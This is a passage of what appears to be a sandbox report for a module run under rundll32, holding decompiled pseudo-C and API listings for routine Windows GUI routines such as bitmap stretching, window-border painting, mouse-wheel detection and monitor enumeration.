                          				intOrPtr _t86;
                          				void* _t91;
                          				void* _t93;
                          				void* _t94;
                          				intOrPtr _t95;
                          
                          				_t93 = _t94;
                          				_t95 = _t94 + 0xffffffcc;
                          				asm("movsd");
                          				asm("movsd");
                          				_t77 = __ecx;
                          				_v8 = __eax;
                          				_v28 = CreateCompatibleDC(0);
                          				_v32 = CreateCompatibleDC(0);
                          				_push(_t93);
                          				_push(0x27f8a42);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t95;
                          				GetObjectA(_v8, 0x18,  &_v56);
                          				if(__ecx == 0) {
                          					_v24 = GetDC(0);
                          					if(_v24 == 0) {
                          						E027F883C(_t77);
                          					}
                          					_push(_t93);
                          					_push(0x27f89b1);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t95;
                          					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
                          					if(_v20 == 0) {
                          						E027F883C(_t77);
                          					}
                          					_pop(_t85);
                          					 *[fs:eax] = _t85;
                          					_push(0x27f89b8);
                          					return ReleaseDC(0, _v24);
                          				} else {
                          					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
                          					if(_v20 != 0) {
                          						_t78 = SelectObject(_v28, _v8);
                          						_t91 = SelectObject(_v32, _v20);
                          						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                          						if(_t78 != 0) {
                          							SelectObject(_v28, _t78);
                          						}
                          						if(_t91 != 0) {
                          							SelectObject(_v32, _t91);
                          						}
                          					}
                          					_pop(_t86);
                          					 *[fs:eax] = _t86;
                          					_push(0x27f8a49);
                          					DeleteDC(_v28);
                          					return DeleteDC(_v32);
                          				}
                          			}

                          APIs
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F890B
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F8915
                          • GetObjectA.GDI32(?,00000018,?), ref: 027F8935
                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 027F894C
                          • GetDC.USER32(00000000), ref: 027F8958
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 027F8985
                          • ReleaseDC.USER32(00000000,00000000), ref: 027F89AB
                          • SelectObject.GDI32(?,?), ref: 027F89C6
                          • SelectObject.GDI32(?,00000000), ref: 027F89D5
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 027F8A01
                          • SelectObject.GDI32(?,00000000), ref: 027F8A0F
                          • SelectObject.GDI32(?,00000000), ref: 027F8A1D
                          • DeleteDC.GDI32(?), ref: 027F8A33
                          • DeleteDC.GDI32(?), ref: 027F8A3C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                          • String ID:
                          • API String ID: 644427674-0
                          • Opcode ID: d1016f65e73a3556ee6b6a39b98399247386cfb7433692c7b29b77ce6e6fa93d
                          • Instruction ID: 4091ab9c750b3d9b18d6ad0b928e2db164e45cebf3f43d0dada16e2c0ce41160
                          • Opcode Fuzzy Hash: d1016f65e73a3556ee6b6a39b98399247386cfb7433692c7b29b77ce6e6fa93d
                          • Instruction Fuzzy Hash: B64109B6E04309AFEB51EBE8DC49FAEB7BDEB08710F410414BA04E7240D775A9008B65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 57%
                          			E02834CB0(intOrPtr* __eax, intOrPtr __edx) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				struct HDC__* _v16;
                          				struct tagRECT _v32;
                          				struct tagRECT _v48;
                          				void* _v64;
                          				intOrPtr* _t195;
                          				intOrPtr* _t198;
                          				intOrPtr _t207;
                          				void* _t210;
                          				intOrPtr _t218;
                          				signed int _t236;
                          				void* _t239;
                          				void* _t241;
                          				intOrPtr _t242;
                          
                          				_t239 = _t241;
                          				_t242 = _t241 + 0xffffffc4;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                          					_v16 = GetWindowDC(E02833F7C(_v8));
                          					_push(_t239);
                          					_push(0x2834f16);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t242;
                          					GetClientRect(E02833F7C(_v8),  &_v32);
                          					GetWindowRect(E02833F7C(_v8),  &_v48);
                          					MapWindowPoints(0, E02833F7C(_v8),  &_v48, 2);
                          					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                          					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					if( *(_v8 + 0x165) != 0) {
                          						_t210 = 0;
                          						if( *(_v8 + 0x163) != 0) {
                          							_t210 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                          						}
                          						if( *(_v8 + 0x164) != 0) {
                          							_t210 = _t210 +  *((intOrPtr*)(_v8 + 0x168));
                          						}
                          						_t236 = GetWindowLongA(E02833F7C(_v8), 0xfffffff0);
                          						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                          							_v48.left = _v48.left - _t210;
                          						}
                          						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                          							_v48.top = _v48.top - _t210;
                          						}
                          						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                          							_v48.right = _v48.right + _t210;
                          						}
                          						if((_t236 & 0x00200000) != 0) {
                          							_t198 =  *0x2864444; // 0x2865890
                          							_v48.right = _v48.right +  *((intOrPtr*)( *_t198))(0x14);
                          						}
                          						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                          							_v48.bottom = _v48.bottom + _t210;
                          						}
                          						if((_t236 & 0x00100000) != 0) {
                          							_t195 =  *0x2864444; // 0x2865890
                          							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t195))(0x15);
                          						}
                          						DrawEdge(_v16,  &_v48,  *(0x2863f88 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x2863f98 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x2863fa8 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x2863fb8 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                          					}
                          					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                          					FillRect(_v16,  &_v48, E027F7CD8( *((intOrPtr*)(_v8 + 0x170))));
                          					_pop(_t218);
                          					 *[fs:eax] = _t218;
                          					_push(0x2834f1d);
                          					return ReleaseDC(E02833F7C(_v8), _v16);
                          				} else {
                          					 *((intOrPtr*)( *_v8 - 0x10))();
                          					_t207 = E0280B168(E0280B088());
                          					if(_t207 != 0) {
                          						_t207 = _v8;
                          						if(( *(_t207 + 0x52) & 0x00000002) != 0) {
                          							_t207 = E0280B850(E0280B088(), 0, _v8);
                          						}
                          					}
                          					return _t207;
                          				}
                          			}

                          APIs
                          • GetWindowDC.USER32(00000000), ref: 02834CE4
                          • GetClientRect.USER32(00000000,?), ref: 02834D07
                          • GetWindowRect.USER32(00000000,?), ref: 02834D19
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02834D2F
                          • OffsetRect.USER32(?,?,?), ref: 02834D44
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 02834D5D
                          • InflateRect.USER32(?,00000000,00000000), ref: 02834D7B
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 02834DD1
                          • DrawEdge.USER32(?,?,00000000,00000008), ref: 02834E9D
                          • IntersectClipRect.GDI32(?,?,?,?,?), ref: 02834EB6
                          • OffsetRect.USER32(?,?,?), ref: 02834ED5
                          • FillRect.USER32(?,?,00000000), ref: 02834EF1
                          • ReleaseDC.USER32(00000000,?), ref: 02834F10
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                          • String ID:
                          • API String ID: 3115931838-0
                          • Opcode ID: db0ba8c56d3c25c2690d912c28c71128f489478f0765ecf8410e398d313d8250
                          • Instruction ID: c95754c4fa979fd565d2b163af559c8dc5051c758b0cc10e60e64a57e0d9be66
                          • Opcode Fuzzy Hash: db0ba8c56d3c25c2690d912c28c71128f489478f0765ecf8410e398d313d8250
                          • Instruction Fuzzy Hash: 7A911C79E00548AFDB42DBA8D988EEEB7FAAF09304F1444A4F518E7251C735AE04CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D707C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                          				intOrPtr* _v8;
                          				struct HWND__* _t19;
                          				int* _t20;
                          				int* _t26;
                          				int* _t27;
                          
                          				_t26 = _t20;
                          				_t27 = __edx;
                          				_v8 = __eax;
                          				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                          				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                          				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                          				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                          				if( *_t27 == 0 || _t19 == 0) {
                          					 *_a8 = 0;
                          				} else {
                          					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                          				}
                          				if( *_t26 == 0 || _t19 == 0) {
                          					 *_a4 = 3;
                          				} else {
                          					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                          				}
                          				return _t19;
                          			}









                          APIs
                          • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 027D7094
                          • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 027D70A0
                          • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 027D70AF
                          • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 027D70BB
                          • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 027D70D3
                          • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 027D70F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                          • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                          • API String ID: 1416857345-3736581797
                          • Opcode ID: fea502fed1ac553271916791ba74b60135fb9086e99c98c10681c9b96741b8c4
                          • Instruction ID: a0e41441913f62f469f2b6cc42c9d31e194344da05b0029aab540f76094777fe
                          • Opcode Fuzzy Hash: fea502fed1ac553271916791ba74b60135fb9086e99c98c10681c9b96741b8c4
                          • Instruction Fuzzy Hash: 121170B0200306BFF7199F66EC81B66F7B9EF88310F208566F9419B244E7B19C40CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E0280B850(void* __eax, void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				struct HDC__* _v12;
                          				struct tagRECT _v28;
                          				struct tagRECT _v44;
                          				char _v56;
                          				char _v72;
                          				signed char _t43;
                          				signed int _t79;
                          				int _t80;
                          				int _t81;
                          				void* _t94;
                          				intOrPtr _t107;
                          				void* _t116;
                          				void* _t119;
                          				void* _t122;
                          				void* _t124;
                          				intOrPtr _t125;
                          
                          				_t122 = _t124;
                          				_t125 = _t124 + 0xffffffbc;
                          				_t94 = __ecx;
                          				_v8 = __edx;
                          				_t116 = __eax;
                          				_t43 = GetWindowLongA(E02833F7C(_v8), 0xffffffec);
                          				if((_t43 & 0x00000002) == 0) {
                          					return _t43;
                          				} else {
                          					GetWindowRect(E02833F7C(_v8),  &_v44);
                          					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                          					_v12 = GetWindowDC(E02833F7C(_v8));
                          					_push(_t122);
                          					_push(0x280b9ab);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t125;
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					_t119 = _t116;
                          					if(_t94 != 0) {
                          						_t79 = GetWindowLongA(E02833F7C(_v8), 0xfffffff0);
                          						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
                          							_t80 = GetSystemMetrics(2);
                          							_t81 = GetSystemMetrics(3);
                          							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                          							E027E9BA4(_v28.right - _t80, _v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							_t119 = _t119;
                          							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                          						}
                          					}
                          					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                          					E0280B3EC( &_v56, 2);
                          					E0280B274(_t119,  &_v56, _v12, 0,  &_v44);
                          					_pop(_t107);
                          					 *[fs:eax] = _t107;
                          					_push(0x280b9b2);
                          					return ReleaseDC(E02833F7C(_v8), _v12);
                          				}
                          			}





















                          APIs
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0280B86B
                          • GetWindowRect.USER32(00000000,?), ref: 0280B886
                          • OffsetRect.USER32(?,?,?), ref: 0280B89B
                          • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0280B8A9
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0280B8DA
                          • GetSystemMetrics.USER32(00000002), ref: 0280B8EF
                          • GetSystemMetrics.USER32(00000003), ref: 0280B8F8
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0280B907
                          • GetSysColorBrush.USER32(0000000F), ref: 0280B934
                          • FillRect.USER32(?,?,00000000), ref: 0280B942
                          • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0280B9AB,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0280B967
                          • ReleaseDC.USER32(00000000,?), ref: 0280B9A5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                          • String ID:
                          • API String ID: 19621357-0
                          • Opcode ID: dd3b8bf5825cceed9d69c52937edff2d9160b7fbd8c008cb9cef823bcc16fb13
                          • Instruction ID: dd5175f33ec712d1c6eeb135d99bbb76e7a4c058a0a16ce2288d5d5faf62968b
                          • Opcode Fuzzy Hash: dd3b8bf5825cceed9d69c52937edff2d9160b7fbd8c008cb9cef823bcc16fb13
                          • Instruction Fuzzy Hash: D6411C76A00108AADB02EBA8DD85EEFB7BEEF49314F100550F514F7290DB35AE418BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E027F5180(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                          				struct tagPOINT _v12;
                          				int _v16;
                          				struct tagRECT _v32;
                          				struct tagRECT _v48;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t60;
                          				int _t61;
                          				RECT* _t64;
                          				struct HDC__* _t65;
                          
                          				_t64 = _a8;
                          				_t65 = _a4;
                          				if( *0x28658bf != 0) {
                          					_t61 = 0;
                          					if(_a12 == 0) {
                          						L14:
                          						return _t61;
                          					}
                          					_v32.left = 0;
                          					_v32.top = 0;
                          					_v32.right = GetSystemMetrics(0);
                          					_v32.bottom = GetSystemMetrics(1);
                          					if(_t65 == 0) {
                          						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                          							L13:
                          							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                          						} else {
                          							_t61 = 1;
                          						}
                          						goto L14;
                          					}
                          					_v16 = GetClipBox(_t65,  &_v48);
                          					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                          						goto L14;
                          					}
                          					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                          					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                          						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                          							goto L13;
                          						}
                          						if(_v16 == 1) {
                          							_t61 = 1;
                          						}
                          						goto L14;
                          					} else {
                          						goto L13;
                          					}
                          				}
                          				 *0x28658ac = E027F4BD4(7, _t60,  *0x28658ac, _t64, _t65);
                          				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                          				goto L14;
                          			}
















                          APIs
                          • EnumDisplayMonitors.USER32(?,?,?,?), ref: 027F51B9
                          • GetSystemMetrics.USER32(00000000), ref: 027F51DE
                          • GetSystemMetrics.USER32(00000001), ref: 027F51E9
                          • GetClipBox.GDI32(?,?), ref: 027F51FB
                          • GetDCOrgEx.GDI32(?,?), ref: 027F5208
                          • OffsetRect.USER32(?,?,?), ref: 027F5221
                          • IntersectRect.USER32(?,?,?), ref: 027F5232
                          • IntersectRect.USER32(?,?,?), ref: 027F5248
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                          • String ID: EnumDisplayMonitors
                          • API String ID: 362875416-2491903729
                          • Opcode ID: bd0a1e25885e2c9767976579d29eb2ae4d1806da749567e1264c18c91e04d6ae
                          • Instruction ID: 8fbc7d31b8e7f1ac34f9b5d283108d2ec7cd734b6fd48e9afaa5892bfa86ca79
                          • Opcode Fuzzy Hash: bd0a1e25885e2c9767976579d29eb2ae4d1806da749567e1264c18c91e04d6ae
                          • Instruction Fuzzy Hash: CA3100B6E04109AFDB51DEE4D848AFFB7BCAB49301F404626EA15E3240E73499018BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0283210C(intOrPtr* __eax, void* __edx) {
                          				struct HDC__* _v8;
                          				struct HBITMAP__* _v12;
                          				void* _v16;
                          				struct tagPAINTSTRUCT _v80;
                          				int _v84;
                          				void* _v96;
                          				int _v104;
                          				void* _v112;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t38;
                          				struct HDC__* _t59;
                          				intOrPtr* _t88;
                          				intOrPtr _t107;
                          				void* _t108;
                          				struct HDC__* _t110;
                          				void* _t113;
                          				void* _t116;
                          				void* _t118;
                          				intOrPtr _t119;
                          
                          				_t116 = _t118;
                          				_t119 = _t118 + 0xffffff94;
                          				_push(_t108);
                          				_t113 = __edx;
                          				_t88 = __eax;
                          				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                          					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E02830CAC(_t88) != 0) {
                          						_t38 = E02831C30(_t88, _t88, _t113, _t108, _t113);
                          					} else {
                          						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
                          					}
                          					return _t38;
                          				} else {
                          					_t110 = GetDC(0);
                          					 *((intOrPtr*)( *_t88 + 0x44))();
                          					 *((intOrPtr*)( *_t88 + 0x44))();
                          					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
                          					ReleaseDC(0, _t110);
                          					_v8 = CreateCompatibleDC(0);
                          					_v16 = SelectObject(_v8, _v12);
                          					 *[fs:eax] = _t119;
                          					_t59 = BeginPaint(E02833F7C(_t88),  &_v80);
                          					E0282E93C(_t88, _v8, 0x14, _v8);
                          					 *((intOrPtr*)(_t113 + 4)) = _v8;
                          					E0283210C(_t88, _t113);
                          					 *((intOrPtr*)(_t113 + 4)) = 0;
                          					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x283225e, _t116);
                          					 *((intOrPtr*)( *_t88 + 0x44))();
                          					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
                          					EndPaint(E02833F7C(_t88),  &_v80);
                          					_pop(_t107);
                          					 *[fs:eax] = _t107;
                          					_push(0x2832265);
                          					SelectObject(_v8, _v16);
                          					DeleteDC(_v8);
                          					return DeleteObject(_v12);
                          				}
                          			}


























                          APIs
                          • GetDC.USER32(00000000), ref: 02832157
                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0283217B
                          • ReleaseDC.USER32(00000000,00000000), ref: 02832186
                          • CreateCompatibleDC.GDI32(00000000), ref: 0283218D
                          • SelectObject.GDI32(00000000,02818D39), ref: 0283219D
                          • BeginPaint.USER32(00000000,?,00000000,0283225E,?,00000000,02818D39,00000000,00000000,00000000,00000000,?), ref: 028321BF
                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,02818D39,00000000,00000000), ref: 0283221B
                          • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,02818D39,00000000,00000000,00000000,00000000,?), ref: 0283222C
                          • SelectObject.GDI32(00000000,?), ref: 02832246
                          • DeleteDC.GDI32(00000000), ref: 0283224F
                          • DeleteObject.GDI32(02818D39), ref: 02832258
                            • Part of subcall function 02831C30: BeginPaint.USER32(00000000,?), ref: 02831C56
                            • Part of subcall function 02831C30: EndPaint.USER32(00000000,?,02831D57), ref: 02831D4A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                          • String ID:
                          • API String ID: 3867285559-0
                          • Opcode ID: ce22d067f6a6e1b912e1d80b92525da941553453a1ba58c3dd3c446508176d18
                          • Instruction ID: b1ba6b8729a1c8661ce565380430381e57c3f89113177fd56779a566ce92393e
                          • Opcode Fuzzy Hash: ce22d067f6a6e1b912e1d80b92525da941553453a1ba58c3dd3c446508176d18
                          • Instruction Fuzzy Hash: BE410D79B00208AFDB11EFA8DD88BAEB7FDAF48704F104469B909DB244DA75ED05CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02831D88(void* __eax, void* __ecx, struct HDC__* __edx) {
                          				struct tagRECT _v44;
                          				struct tagRECT _v60;
                          				void* _v68;
                          				int _v80;
                          				int _t79;
                          				void* _t134;
                          				int _t135;
                          				void* _t136;
                          				void* _t159;
                          				void* _t160;
                          				void* _t161;
                          				struct HDC__* _t162;
                          				intOrPtr* _t163;
                          
                          				_t163 =  &(_v44.bottom);
                          				_t134 = __ecx;
                          				_t162 = __edx;
                          				_t161 = __eax;
                          				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                          				}
                          				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                          				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                          					L17:
                          					_t79 =  *(_t161 + 0x19c);
                          					if(_t79 == 0) {
                          						L27:
                          						return _t79;
                          					}
                          					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                          					if(_t79 < 0) {
                          						goto L27;
                          					}
                          					_v44.right = _t79 + 1;
                          					_t159 = 0;
                          					do {
                          						_t79 = E027EB1E0( *(_t161 + 0x19c), _t159);
                          						_t135 = _t79;
                          						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                          							_v44.left = CreateSolidBrush(E027F7018(0xff000010));
                          							E027E9BA4( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                          							FrameRect(_t162,  &_v44, _v44);
                          							DeleteObject(_v60.right);
                          							_v60.left = CreateSolidBrush(E027F7018(0xff000014));
                          							E027E9BA4( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                          							FrameRect(_t162,  &_v60, _v60);
                          							_t79 = DeleteObject(_v68);
                          						}
                          						_t159 = _t159 + 1;
                          						_t75 =  &(_v44.right);
                          						 *_t75 = _v44.right - 1;
                          					} while ( *_t75 != 0);
                          					goto L27;
                          				}
                          				_t160 = 0;
                          				if(_t134 != 0) {
                          					_t160 = E027EB23C(_t78, _t134);
                          					if(_t160 < 0) {
                          						_t160 = 0;
                          					}
                          				}
                          				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                          				if(_t160 <  *_t163) {
                          					do {
                          						_t136 = E027EB1E0( *((intOrPtr*)(_t161 + 0x198)), _t160);
                          						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                          							E027E9BA4( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                          							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                          								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                          									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                          								}
                          								_v60.top = SaveDC(_t162);
                          								E0282C064(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                          								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                          								E0282E93C(_t136, _t162, 0xf, 0);
                          								RestoreDC(_t162, _v80);
                          								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                          							}
                          						}
                          						_t160 = _t160 + 1;
                          					} while (_t160 < _v60.top);
                          				}
                          			}

















                          APIs
